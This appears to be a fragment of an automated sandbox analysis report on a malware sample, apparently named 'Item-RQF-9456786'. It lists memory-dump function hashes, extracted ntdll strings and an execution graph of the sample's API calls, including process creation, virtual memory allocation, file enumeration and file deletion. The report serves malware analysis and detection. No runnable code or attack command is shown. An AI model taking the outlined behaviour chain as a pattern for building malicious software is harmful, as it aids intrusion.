                                                                                    • Opcode Fuzzy Hash: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                                                    • Instruction Fuzzy Hash: 9D90022160540502D60172584404617400AD7D1241F95C036A2024575ECB25CBA6A232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                                                    • Instruction ID: f59250e4770d0e19d23eb0730b09f07f85bd64a9afc2f77cae788fda0174fbc7
                                                                                    • Opcode Fuzzy Hash: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                                                    • Instruction Fuzzy Hash: 1F90022120584442D64073584804B0F8105D7E2202F95C02DA5156574CCA15CA695722
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                                                    • Instruction ID: 7518df012147020bf278f6f953c188b8591faebdd23702be240d78f4fa555d09
                                                                                    • Opcode Fuzzy Hash: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                                                    • Instruction Fuzzy Hash: 0A90022124540802D640725884147074006D7D1601F55C025A1024574DC716CB7967B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                                                    • Instruction ID: a7f7f84ff2c0b91613d8efa65152bd0e5e9b3798271f75486db265ff8d2cc528
                                                                                    • Opcode Fuzzy Hash: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                                                    • Instruction Fuzzy Hash: 7390022124945102D650725C44046178005F7E1201F55C035A18145B4DC655CA696322
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                                                    • Instruction ID: 1bbaf283fb038aa6a6756da4a75377ec0c01c547d3630403fd55e450db913ee2
                                                                                    • Opcode Fuzzy Hash: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                                                    • Instruction Fuzzy Hash: 8990023520540402DA10725858046474046D7D1301F55D425A1424578DC754CAB5A222
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                                                    • Instruction ID: 26cb14000f2b546b4e05629e6c39602eb1cb4363adbfc7d1b91cffa7072be0d0
                                                                                    • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                                                    • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                                    • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                                                    • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                                    • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                                    • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                                                    • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                                    • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                                    • Execute=1, xrefs: 01814713
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                                    • ExecuteOptions, xrefs: 018146A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                                    • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                                                    • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                                    • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 0181031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                                    • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                                                    • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                                    • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 01817B8E
                                                                                    • RTL: Re-Waiting, xrefs: 01817BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                                    • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                                                    • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                                    • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 018172A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                                    • RTL: Re-Waiting, xrefs: 018172C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                                    • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                                                    • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                                    • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                                    • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                                                    • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                                    • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                                    • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                                    • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                                    • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.1%
                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                    Signature Coverage:2.2%
                                                                                    Total number of Nodes:449
                                                                                    Total number of Limit Nodes:74
                                                                                    execution_graph 81659 3009e80 81662 300a0ea 81659->81662 81661 300a423 81662->81661 81663 302b340 81662->81663 81664 302b366 81663->81664 81669 30040d0 81664->81669 81666 302b372 81667 302b3ab 81666->81667 81672 3025750 81666->81672 81667->81661 81671 30040dd 81669->81671 81676 3013330 81669->81676 81671->81666 81673 30257b2 81672->81673 81675 30257bf 81673->81675 81700 3011b10 81673->81700 81675->81667 81677 301334a 81676->81677 81679 3013360 81677->81679 81680 302a060 81677->81680 81679->81671 81682 302a07a 81680->81682 81681 302a0a9 81681->81679 81682->81681 81687 3028c50 81682->81687 81688 3028c6d 81687->81688 81694 5012c0a 81688->81694 81689 3028c99 81691 302b6e0 81689->81691 81697 3029970 81691->81697 81693 302a122 81693->81679 81695 5012c11 81694->81695 81696 5012c1f LdrInitializeThunk 81694->81696 81695->81689 81696->81689 81698 302998d 81697->81698 81699 302999e RtlFreeHeap 81698->81699 81699->81693 81701 3011b4b 81700->81701 81716 3017f80 81701->81716 81703 3011b53 81714 3011e30 81703->81714 81727 302b7c0 81703->81727 81705 3011b69 81706 302b7c0 RtlAllocateHeap 81705->81706 81707 3011b7a 81706->81707 81708 302b7c0 RtlAllocateHeap 81707->81708 81709 3011b8b 81708->81709 81715 3011c1f 81709->81715 81738 3016b20 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81709->81738 81712 3011ddf 81734 3028090 81712->81734 81714->81675 81730 3014650 81715->81730 81717 3017fac 81716->81717 81739 3017e70 81717->81739 81720 3017ff1 81723 301800d 81720->81723 81725 3029600 NtClose 81720->81725 81721 3017fd9 81722 3017fe4 81721->81722 81745 3029600 81721->81745 81722->81703 81723->81703 81726 3018003 81725->81726 81726->81703 81753 3029920 81727->81753 81729 302b7d8 81729->81705 81731 3014674 81730->81731 81732 30146b0 LdrLoadDll 81731->81732 81733 301467b 81731->81733 81732->81733 81733->81712 81735 30280f2 81734->81735 81737 30280ff 81735->81737 81756 3011e40 81735->81756 81737->81714 81738->81715 81740 3017f66 81739->81740 81741 3017e8a 81739->81741 81740->81720 81740->81721 81748 3028cf0 81741->81748 81744 3029600 NtClose 81744->81740 81746 302961a 81745->81746 81747 302962b NtClose 81746->81747 81747->81722 81749 3028d0a 81748->81749 81752 50135c0 LdrInitializeThunk 81749->81752 81750 3017f5a 81750->81744 81752->81750 81754 302993d 81753->81754 81755 302994e RtlAllocateHeap 81754->81755 81755->81729 81759 3011e60 81756->81759 81772 3018250 81756->81772 81758 30123b0 81758->81737 81759->81758 81776 3021290 81759->81776 81762 3012074 81784 302c8b0 81762->81784 81763 3011ebe 81763->81758 81779 302c780 81763->81779 81766 3012089 81768 30120d9 81766->81768 81790 3010960 81766->81790 81768->81758 81770 3010960 LdrInitializeThunk 81768->81770 81793 30181f0 81768->81793 81769 30181f0 LdrInitializeThunk 81771 3012227 81769->81771 81770->81768 81771->81768 81771->81769 81773 301825d 81772->81773 81774 3018285 81773->81774 81775 301827e SetErrorMode 81773->81775 81774->81759 81775->81774 81778 30212b1 81776->81778 81797 302b650 81776->81797 81778->81763 81780 302c790 81779->81780 81781 302c796 81779->81781 81780->81762 81782 302b7c0 RtlAllocateHeap 81781->81782 81783 302c7bc 81782->81783 81783->81762 81785 302c820 81784->81785 81786 302c87d 81785->81786 81787 302b7c0 RtlAllocateHeap 81785->81787 81786->81766 81788 302c85a 81787->81788 81789 302b6e0 RtlFreeHeap 81788->81789 81789->81786 81804 3029890 81790->81804 81794 3018203 81793->81794 81809 3028b50 81794->81809 81796 301822e 81796->81768 81800 3029770 81797->81800 81799 302b681 81799->81778 81801 3029805 81800->81801 81803 302979e 81800->81803 81802 302981b NtAllocateVirtualMemory 81801->81802 81802->81799 81803->81799 81805 30298aa 81804->81805 81808 5012c70 LdrInitializeThunk 81805->81808 81806 3010982 81806->81771 81808->81806 81810 3028bce 81809->81810 81812 3028b7e 81809->81812 81814 5012dd0 LdrInitializeThunk 81810->81814 81811 3028bf3 81811->81796 81812->81796 81814->81811 81815 301c700 81817 301c729 81815->81817 81816 301c82d 81817->81816 81818 301c7d3 FindFirstFileW 81817->81818 81818->81816 81820 301c7ee 81818->81820 81819 301c814 FindNextFileW 81819->81820 81821 301c826 FindClose 81819->81821 81820->81819 81821->81816 81822 301ae40 81827 301ab50 81822->81827 81824 301ae4d 81841 301a7d0 81824->81841 81826 301ae69 81828 301ab75 81827->81828 81852 3018460 81828->81852 81831 301acc3 81831->81824 81833 301acda 81833->81824 81834 301acd1 81834->81833 81836 301adc7 81834->81836 81871 301a220 81834->81871 81838 301ae2a 81836->81838 81880 301a590 81836->81880 81839 302b6e0 RtlFreeHeap 81838->81839 81840 301ae31 81839->81840 81840->81824 81842 301a7e6 81841->81842 81849 301a7f1 81841->81849 81843 302b7c0 RtlAllocateHeap 81842->81843 81842->81849 81843->81849 81844 301a812 81844->81826 81845 3018460 GetFileAttributesW 81845->81849 81846 301ab22 81847 301ab3b 81846->81847 81848 302b6e0 RtlFreeHeap 81846->81848 81847->81826 81848->81847 81849->81844 81849->81845 81849->81846 81850 301a220 RtlFreeHeap 81849->81850 81851 301a590 RtlFreeHeap 81849->81851 81850->81849 81851->81849 81853 3018481 81852->81853 81854 3018488 GetFileAttributesW 81853->81854 81855 3018493 81853->81855 81854->81855 81855->81831 81856 3023480 81855->81856 81857 302348e 81856->81857 81858 3023495 81856->81858 81857->81834 81859 3014650 LdrLoadDll 81858->81859 81860 30234ca 81859->81860 81861 30234d9 81860->81861 81884 3022f40 LdrLoadDll 81860->81884 81863 302b7c0 RtlAllocateHeap 81861->81863 81867 3023687 81861->81867 81864 30234f2 81863->81864 81865 302367d 81864->81865 81864->81867 81868 302350e 81864->81868 81866 302b6e0 RtlFreeHeap 81865->81866 81865->81867 81866->81867 81867->81834 81868->81867 81869 302b6e0 RtlFreeHeap 81868->81869 81870 3023671 81869->81870 81870->81834 81872 301a246 81871->81872 81885 301dc70 81872->81885 81874 301a2b8 81876 301a440 81874->81876 81877 301a2d6 81874->81877 81875 301a425 81875->81834 81876->81875 81878 301a0e0 RtlFreeHeap 81876->81878 81877->81875 81890 301a0e0 81877->81890 81878->81876 81881 301a5b6 81880->81881 81882 301dc70 RtlFreeHeap 81881->81882 81883 301a63d 81882->81883 81883->81836 81884->81861 81886 301dc7b 81885->81886 81887 301dca1 81886->81887 81888 302b6e0 RtlFreeHeap 81886->81888 81887->81874 81889 301dce4 81888->81889 81889->81874 81891 301a0fd 81890->81891 81894 301dd00 81891->81894 81893 301a203 81893->81877 81895 301dd24 81894->81895 81896 301ddce 81895->81896 81897 302b6e0 RtlFreeHeap 81895->81897 81896->81893 81897->81896 81898 3029300 81899 30293b4 81898->81899 81901 302932f 81898->81901 81900 30293ca NtCreateFile 81899->81900 81902 30261c0 81903 302621a 81902->81903 81905 3026227 81903->81905 81906 3023bc0 81903->81906 81907 302b650 NtAllocateVirtualMemory 81906->81907 81909 3023c01 81907->81909 81908 3023d0e 81908->81905 81909->81908 81910 3014650 LdrLoadDll 81909->81910 81912 3023c47 81910->81912 81911 3023c90 Sleep 81911->81912 81912->81908 81912->81911 81913 3028c00 81914 3028c1a 81913->81914 81917 5012df0 LdrInitializeThunk 81914->81917 81915 3028c42 81917->81915 81918 3028a80 81919 3028b0c 81918->81919 81920 3028aab 81918->81920 81923 5012ee0 LdrInitializeThunk 81919->81923 81921 3028b3d 81923->81921 81924 30218c0 81925 30218dc 81924->81925 81926 3021904 81925->81926 81927 3021918 81925->81927 81929 3029600 NtClose 81926->81929 81928 3029600 NtClose 81927->81928 81930 3021921 81928->81930 81931 302190d 81929->81931 81934 302b800 RtlAllocateHeap 81930->81934 81933 302192c 81934->81933 81935 3019d0f 81936 3019d26 81935->81936 81937 3019d2b 81935->81937 81938 302b6e0 RtlFreeHeap 81937->81938 81939 3019d5d 81937->81939 81938->81939 81940 300b650 81941 300ccc1 81940->81941 81942 302b650 NtAllocateVirtualMemory 81940->81942 81942->81941 81943 3017410 81944 3017482 81943->81944 81945 3017428 81943->81945 81945->81944 81947 301b370 81945->81947 81948 301b396 81947->81948 81949 301b5cf 81948->81949 81974 3029a00 81948->81974 81949->81944 81951 301b412 81951->81949 81952 302c8b0 2 API calls 81951->81952 81953 301b431 81952->81953 81953->81949 81954 301b508 81953->81954 81955 3028c50 LdrInitializeThunk 81953->81955 81956 3015c30 LdrInitializeThunk 81954->81956 81958 301b527 81954->81958 81957 301b493 81955->81957 81956->81958 81957->81954 81963 301b49c 81957->81963 81961 301b5b7 81958->81961 81980 30287c0 81958->81980 81959 301b4f0 81960 30181f0 LdrInitializeThunk 81959->81960 81965 301b4fe 81960->81965 81966 30181f0 LdrInitializeThunk 81961->81966 81962 301b4ce 81995 30248d0 LdrInitializeThunk 81962->81995 81963->81949 81963->81959 81963->81962 81977 3015c30 81963->81977 81965->81944 81969 301b5c5 81966->81969 81969->81944 81970 301b58e 81985 3028870 81970->81985 81972 301b5a8 81990 30289d0 81972->81990 81975 3029a1d 81974->81975 81976 3029a2e CreateProcessInternalW 81975->81976 81976->81951 81979 3015c6e 81977->81979 81996 3028e20 81977->81996 81979->81962 81981 302883d 81980->81981 81983 30287ee 81980->81983 82002 50139b0 LdrInitializeThunk 81981->82002 81982 3028862 81982->81970 81983->81970 81986 30288ed 81985->81986 81988 302889e 81985->81988 82003 5014340 LdrInitializeThunk 81986->82003 81987 3028912 81987->81972 81988->81972 81991 30289fe 81990->81991 81992 3028a4d 81990->81992 81991->81961 82004 5012fb0 LdrInitializeThunk 81992->82004 81993 3028a72 81993->81961 81995->81959 81997 3028eca 81996->81997 81999 3028e4c 81996->81999 82001 5012d10 LdrInitializeThunk 81997->82001 81998 3028f0f 81998->81979 81999->81979 82001->81998 82002->81982 82003->81987 82004->81993 82005 3016e90 82006 3016eba 82005->82006 82009 3018020 82006->82009 82008 3016ee4 82010 301803d 82009->82010 82016 3028d40 82010->82016 82012 301808d 82013 3018094 82012->82013 82014 3028e20 LdrInitializeThunk 82012->82014 82013->82008 82015 30180bd 82014->82015 82015->82008 82017 3028ddb 82016->82017 82018 3028d6e 82016->82018 82021 5012f30 LdrInitializeThunk 82017->82021 82018->82012 82019 3028e14 82019->82012 82021->82019 82022 5012ad0 LdrInitializeThunk 82023 302b3d0 82024 302b3db 82023->82024 82025 302b3fa 82024->82025 82027 3025c40 82024->82027 82028 3025ca2 82027->82028 82030 3025caf 82028->82030 82031 3012420 82028->82031 82030->82025 82032 30123dc 82031->82032 82033 3012445 82031->82033 82032->82033 82034 3028c50 LdrInitializeThunk 82032->82034 82033->82030 82035 30123f6 82034->82035 82038 30296a0 82035->82038 82037 301240b 82037->82030 82039 302972c 82038->82039 82041 30296cb 82038->82041 82043 5012e80 LdrInitializeThunk 82039->82043 82040 302975d 82040->82037 82041->82037 82043->82040 82054 3021c50 82055 3021c69 82054->82055 82056 3021cb4 82055->82056 82059 3021cf7 82055->82059 82061 3021cfc 82055->82061 82057 302b6e0 RtlFreeHeap 82056->82057 82058 3021cc4 82057->82058 82060 302b6e0 RtlFreeHeap 82059->82060 82060->82061 82062 3021451 82074 3029470 82062->82074 82064 3021472 82065 3021490 82064->82065 82066 30214a5 82064->82066 82067 3029600 NtClose 82065->82067 82068 3029600 NtClose 82066->82068 82069 3021499 82067->82069 82071 30214ae 82068->82071 82070 30214e5 82071->82070 82072 302b6e0 RtlFreeHeap 82071->82072 82073 30214d9 82072->82073 82075 3029517 82074->82075 82077 302949e 82074->82077 82076 302952d NtReadFile 82075->82076 82076->82064 82077->82064 82078 3018917 82079 301891a 82078->82079 82080 30188d1 82079->82080 82082 30171b0 82079->82082 82083 30171c6 82082->82083 82085 30171ff 82082->82085 82083->82085 82086 3017020 LdrLoadDll 82083->82086 82085->82080 82086->82085 82087 3012898 82090 30163c0 82087->82090 82089 30128c3 82091 30163f3 82090->82091 82092 3016417 82091->82092 82097 3029170 82091->82097 82092->82089 82094 301643a 82094->82092 82095 3029600 NtClose 82094->82095 82096 30164ba 82095->82096 82096->82089 82098 302918a 82097->82098 82101 5012ca0 LdrInitializeThunk 82098->82101 82099 30291b6 82099->82094 82101->82099 82102 3009e20 82103 3009e2f 82102->82103 82104 3009e70 82103->82104 82105 3009e5d CreateThread 82103->82105 82113 3029560 82114 30295d4 82113->82114 82116 302958b 82113->82116 82115 30295ea NtDeleteFile 82114->82115 